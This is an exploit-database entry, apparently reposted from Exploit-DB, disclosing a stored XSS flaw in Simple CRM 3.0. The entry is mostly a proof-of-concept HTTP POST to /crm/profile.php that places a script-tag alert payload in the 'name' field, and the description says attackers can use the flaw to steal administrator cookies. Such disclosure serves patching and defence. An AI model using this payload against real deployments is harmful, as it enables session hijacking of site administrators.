免费、自由、人人(PwnWiki.Com)可编辑的漏洞库
,
# Exploit Title: Simple CRM 3.0 - 'name' Stored Cross site scripting (XSS) # Date: 20/06/2021 # Exploit Author: Riadh Benlamine (rbn0x00) # Vendor Homepage: https://phpgurukul.com/ # Software Link: https://phpgurukul.com/small-crm-php/ # Version: 3.0 # Category: Webapps # Tested on: Apache2+MariaDB latest version # Description : Simple CRM suffers from Cross-site scripting, allowing authenticated attackers to obtain administrator cookies. Vunlerable page: /crm/profile.php POC: ---- POST /crm/profile.php HTTP/1.1 Host: localhost Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: multipart/form-data; boundary=---------------------------386571683933745493952831205283 Content-Length: 779 Origin: http://localhost Connection: close Referer: http://localhost/crm/profile.php Cookie: PHPSESSID=l0iqlrmehhcasinv0ip09e3ls1 Upgrade-Insecure-Requests: 1 -----------------------------386571683933745493952831205283 Content-Disposition: form-data; name="name" <script>alert('xss')</script> -----------------------------386571683933745493952831205283 Content-Disposition: form-data; name="alt_email" -----------------------------386571683933745493952831205283 Content-Disposition: form-data; name="phone" 0123456789 -----------------------------386571683933745493952831205283 Content-Disposition: form-data; name="gender" m -----------------------------386571683933745493952831205283 Content-Disposition: form-data; name="address" -----------------------------386571683933745493952831205283 Content-Disposition: form-data; name="update" Update -----------------------------386571683933745493952831205283--
PWNWIK.COM